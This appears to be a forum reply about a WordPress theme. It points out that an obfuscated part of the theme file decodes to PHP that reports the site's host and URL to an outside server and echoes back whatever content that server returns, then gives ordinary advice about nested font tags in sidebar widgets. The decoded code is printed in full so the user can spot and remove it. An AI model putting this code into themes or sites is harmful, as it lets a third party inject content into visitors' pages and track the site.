Did you make sure to remove the last bit as well? The second half of that file decodes to this:
error_reporting(0);$CodeURL = "https://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"])."&uri=".urlencode($_SERVER["REQUEST_URI"]);if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) { echo @file_get_contents($CodeURL);} elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) { $content = @file($CodeURL); echo @join("", $content);} elseif (function_exists("curl_init")) { $ch = curl_init($CodeURL); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch);}
Doesn’t look very friendly to me. My guess would be that at the very least it’s probably telling someone where their theme is, and who’s using it.
I think your font trouble might start in the right sidebar text widgets:
<div class="textwidget"><br />
<font size="2"><font color="#000000">Sign up for our monthly newsletter to download your free copy of our ebook, Organic Gardening for Beginners.....
I see a few font size=”2″ ‘ s in there.
…and I see a font size=”3″ located here…
<font size="3"><font color="#000000"> Legacy Hydroponics</font>
Located directly below the organic worm farm image in the left sidebar.
Maybe there is some whacky (pardon my scientific terms!) inheritance issue happening. Might be worth taking a look.